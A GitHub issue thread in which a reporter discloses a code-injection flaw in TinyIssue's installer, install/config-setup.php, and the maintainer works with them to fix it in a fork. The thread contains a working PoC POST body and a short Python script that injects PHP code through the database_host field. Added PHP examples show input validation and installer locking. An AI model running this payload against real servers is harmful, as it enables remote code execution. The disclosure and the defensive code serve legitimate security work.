There is a security problem that can getshell #237

Closed
MrFk opened this issue Feb 20, 2019 · 32 comments
2 participants

@MrFk commented Feb 20, 2019

Problem file: install/config-setup.php, line 13:

$config_file = str_replace('localhost', $_POST['database_host'], $config_file);

This causes a security problem that can getshell.

PoC:

POST /install/config-setup.php

data: create_config=123&database_host=%27%29%2C%27a%27%3D%3Evar_dump%28phpinfo%28%29%29%29%3F%3E

Finally, in config.app.php, you can see the phpinfo();

[screenshot]

My email is: jack.jiang@dbappsecurity.com.cn
Thank you very much
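An added example (not code from TinyIssue or pixeline/bugs) of the mechanism behind the report. The template below is a constructed stand-in for config.app.example.php, shaped so that the reported database_host value closes the array the way the reporter describes; the real template's contents are not reproduced in this issue. The hardened writer allow-lists the host and emits the file with var_export(), so the input can only ever become a string literal. The bare_identifiers() helper uses token_get_all() to show where the injected phpinfo() lands as code rather than data:

```php
<?php
// Added example, not TinyIssue's code. Shows why str_replace() on a PHP
// template is code injection and how to emit the config without that risk.

// Constructed stand-in for config.app.example.php (assumption: the real
// template's exact shape is not shown in the issue). Built so the reported
// payload closes the inner and outer array and then ends the PHP block.
$template = <<<'PHP'
<?php
return array(
    'database' => array(
        'host' => 'localhost',
        'name' => 'tinyissue',
    ),
);
PHP;

// Vulnerable pattern from the report: textual substitution of a POST value
// into PHP source. Any quote or parenthesis in $host becomes syntax.
function build_config_vulnerable(string $template, string $host): string
{
    return str_replace('localhost', $host, $template);
}

// Hardened: allow-list the value, then let var_export() produce a quoted,
// escaped literal. The file's structure is fixed by this code, never by input.
function build_config_safe(string $host): string
{
    // host name or IP with optional :port; quotes, spaces and brackets cannot pass
    if (!preg_match('/^[A-Za-z0-9.-]{1,253}(:[0-9]{1,5})?$/', $host)) {
        throw new InvalidArgumentException('invalid database host');
    }
    $config = array(
        'database' => array(
            'host' => $host,
            'name' => 'tinyissue',
        ),
    );
    return "<?php\nreturn " . var_export($config, true) . ";\n";
}

// Bare identifiers (T_STRING tokens) in generated source. A config file that
// holds only literals has none; an injected call such as phpinfo() shows up here.
function bare_identifiers(string $src): array
{
    $names = array();
    foreach (token_get_all($src) as $tok) {
        if (is_array($tok) && $tok[0] === T_STRING) {
            $names[] = $tok[1];
        }
    }
    return $names;
}

$payload = "'),'a'=>var_dump(phpinfo()))?>";   // database_host value from the report

// 1. The reported substitution: the array is closed early and phpinfo() is live code.
$bad = build_config_vulnerable($template, $payload);
echo $bad, "\n";
print_r(bare_identifiers($bad));

// 2. The allow-list rejects the payload before any file is written.
try {
    build_config_safe($payload);
} catch (InvalidArgumentException $e) {
    echo "rejected: ", $e->getMessage(), "\n";
}

// 3. Even without the allow-list, var_export() escapes the quotes and keeps the
//    whole payload inside one string token, so '?>' never ends the PHP block.
echo var_export($payload, true), "\n";

// 4. A valid host produces a file made only of literals.
$good = build_config_safe('db.internal:3306');
echo $good;
print_r(bare_identifiers($good));
```

Running it prints the broken config with var_dump and phpinfo listed as bare identifiers, the rejection from the allow-list, the escaped single-token form of the payload, and a clean file with no bare identifiers at all. The allow-list is the primary control, since a database host has a known shape; var_export() is the second layer, there so that the file's syntax stays fixed even if the validation is ever relaxed.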

@Patriboom commented Feb 20, 2019

What is your suggestion?

@MrFk (Author) commented Feb 20, 2019

After install.php, delete config-setup.php with the PHP code.

@Patriboom commented Feb 20, 2019

This already works, and many more features are available on the following fork: https://github.com/pixeline/bugs/issues

@MrFk (Author) commented Feb 20, 2019

But it didn't delete the file on my computer; is there anything wrong with it?

@Patriboom commented Feb 20, 2019

No.
The system is supposed to check if the config file exists. If so, the system launches the application.
If not, it launches the installation.
It doesn't matter if the installation file is not deleted. If the system finds the config file, the installation file will never be launched anymore.

@MrFk (Author) commented Feb 20, 2019

But after finishing the install, config.app.example still exists, and you need to delete config.app.example after the installation with the PHP code.

@Patriboom commented Feb 20, 2019

No.
You don't need to delete the file.
It can stay there as a « backup », since it will never be read anymore by the system.

@MrFk (Author) commented Feb 20, 2019

But I can cause a security problem.

@MrFk (Author) commented Feb 20, 2019

[screenshot]
It shouldn't be deleted by the people but by the code.

@Patriboom commented Feb 20, 2019

That's solved in more recent forks like the one I mentioned before.
The actual Mikelbring/tinyissue is very old. Last update SIX YEARS ago!!!
I suggest you use a more recent fork.

@MrFk (Author) commented Feb 20, 2019

No, https://github.com/pixeline/bugs also has this problem, look at this:

[screenshot]

@Patriboom commented Feb 20, 2019

The same code. I know.
But it doesn't ask you to delete any file after a complete install process.

@MrFk (Author) commented Feb 20, 2019

So it is a security problem in the default setting. The install file should be deleted or renamed after the installation by the install program.
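An added example, not code from either project, of the gating the thread converges on. The reporter's PoC posts straight to install/config-setup.php, so an "if the config file exists, launch the application" check in the front controller is never reached; the guard has to live in the installer script itself, and the installer should remove itself once it has done its job. File names, the lock-file name and the scratch directory are assumptions made for this demo:

```php
<?php
// Added example, not TinyIssue's or pixeline/bugs' code. Guard logic for a
// stand-alone installer script (install/config-setup.php) that can be
// requested directly by URL. Paths below are assumptions for the demo.

// True once the application is installed. Two signals are checked: the
// generated config and a lock file, so deleting or renaming config.app.php
// later does not silently reopen the installer.
function install_is_locked(string $config_path, string $lock_path): bool
{
    return is_file($config_path) || is_file($lock_path);
}

// Write the config atomically (temp file + rename, so a half-written config
// never exists at the final path), drop the lock, then remove the installer
// scripts. Returns the scripts that could not be removed, e.g. because the
// web server user cannot write to install/; the lock still blocks them.
function finish_install(string $config_path, string $config_source,
                        string $lock_path, string $installer_dir): array
{
    $tmp = $config_path . '.tmp';
    if (file_put_contents($tmp, $config_source, LOCK_EX) === false
        || !rename($tmp, $config_path)) {
        throw new RuntimeException("cannot write $config_path");
    }
    file_put_contents($lock_path, gmdate('c') . "\n", LOCK_EX);

    $left = array();
    foreach (glob($installer_dir . '/*.php') ?: array() as $script) {
        if (!@unlink($script)) {
            $left[] = $script;
        }
    }
    return $left;
}

// What the top of install/config-setup.php should do before it reads $_POST.
function installer_entry(string $config_path, string $lock_path): void
{
    if (install_is_locked($config_path, $lock_path)) {
        http_response_code(403);
        header('Content-Type: text/plain');
        echo "Installation already completed.\n";
        exit;
    }
    // ... render the form / handle create_config from here on
}

// Demo in a scratch directory under the system temp dir (constructed layout).
$root = sys_get_temp_dir() . '/installer-demo-' . getmypid();
mkdir($root . '/install', 0700, true);
file_put_contents($root . '/install/config-setup.php', "<?php // stand-in installer\n");
$config = $root . '/config.app.php';
$lock   = $root . '/install/.installed';

// fresh checkout: not locked, the installer may run
var_dump(install_is_locked($config, $lock));

// after a successful install: locked, nothing left behind, installer file gone
$left = finish_install($config, "<?php\nreturn array();\n", $lock, $root . '/install');
var_dump(install_is_locked($config, $lock), $left,
         is_file($root . '/install/config-setup.php'));

// an administrator removes the config later: the lock keeps the installer closed
unlink($config);
var_dump(install_is_locked($config, $lock));
```

installer_entry() is the shape the first lines of config-setup.php should take; everything that touches $_POST comes after it. The lock file covers two cases the "does config.app.php exist" check alone does not: unlink() failing because install/ is not writable by the web server user, and the config being removed or renamed after installation.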

@Patriboom commented Feb 20, 2019

Where do you get such screenshots from?
I would like to repeat the same test as you did.

@Patriboom commented Feb 20, 2019

Please explain the issue you've found better.
What can create such « miss coding » about you?

@MrFk (Author) commented Feb 20, 2019

I built the environment on my computer.
I escaped the array in config.app.example.php.

PostData is '),'a'=>var_dump(phpinfo()))?>

@Patriboom commented Feb 20, 2019

For sure, with any open source code, you can change the code and force it to do something which has not been planned by the initial project.
Does the original code expose users to any threat?
If so, which? And how?

Your initial sentence was:

> cause a security problem that can getshell

What is "getshell"?

@MrFk (Author) commented Feb 20, 2019

"Getshell" means remote command execution; an attacker can execute commands on your server.

@Patriboom commented Feb 20, 2019

Ok.
Now, how does the code permit that?
Don't say « the hacker can change the code ». If he can, he doesn't need the code to hack the computer; it's already hacked.

@MrFk (Author) commented Feb 20, 2019

The hacker just needs to repeat my postdata, create_config=123&database_host=%27%29%2C%27a%27%3D%3Evar_dump%28phpinfo%28%29%29%29%3F%3E, like this; the attacker can execute any code he likes.

@Patriboom commented Feb 20, 2019

If, and only if, the attacker

  1. gets access to the computer
  2. knows the exact name and address of the specific page config-setup.php
    If the hacker has it, he doesn't need config-setup.php as a tool to go further; he is already in the machine and does whatever he wants.
    Where, when and how do you submit such postdata?

Or maybe you put the create_config= in the install page's field.

@MrFk (Author) commented Feb 20, 2019

Yeah, by the default setting, a hacker can access install/config-setup.php easily.

@Patriboom commented Feb 20, 2019

I tried your code

create_config=123&database_host=%27%29%2C%27a%27%3D%3Evar_dump%28phpinfo%28%29%29%29%3F%3E

replacing "localhost" in the install form.

I got an error from the system, not any kind of phpinfo() page.

@Patriboom commented Feb 20, 2019

Next, I'll try to replace the "create_config" value with your code.

@Patriboom commented Feb 20, 2019

Doing so: nothing like a phpinfo() again.

@Patriboom commented Feb 20, 2019

> Yeah, by the default setting, a hacker can access install/config-setup.php easily.

I would like to help people avoid that. But I'm still unable to redo what you're doing.
Could you explain it to me step by step, please?

@MrFk (Author) commented Feb 20, 2019

OK, I'll show you the code in a minute.

@MrFk (Author) commented Feb 20, 2019

import requests

def attack(url):
    # POST the payload straight to the installer script; database_host is the
    # value config-setup.php substitutes for 'localhost' in the config template
    datas = {
        'create_config': '123',
        'database_host': "'),'a'=>var_dump(phpinfo()))?>"
    }

    # the fork installs under /bugs/; adjust the path for a plain tinyissue checkout
    attack_url = '{0}/bugs/install/config-setup.php'.format(url)

    res = requests.post(attack_url, data=datas)

    # the response is the installer's page; the injected phpinfo() shows up
    # when the written config.app.php is loaded afterwards
    print(res.content)


if __name__ == '__main__':
    # edit your url here
    attack('http://192.168.2.147')

The code uses Python 2.7; you just need to edit the URL.

@Patriboom commented Feb 20, 2019

Nice.
Big thanks.
The fork will be updated today.

@Patriboom commented Feb 20, 2019

https://github.com/pixeline/bugs's install now deletes the config file.

@MrFk (Author) commented Feb 20, 2019

It's okay.

@Patriboom commented Feb 20, 2019

For any further suggestion, please comment on https://github.com/pixeline/bugs

MrFk closed this Mar 4, 2019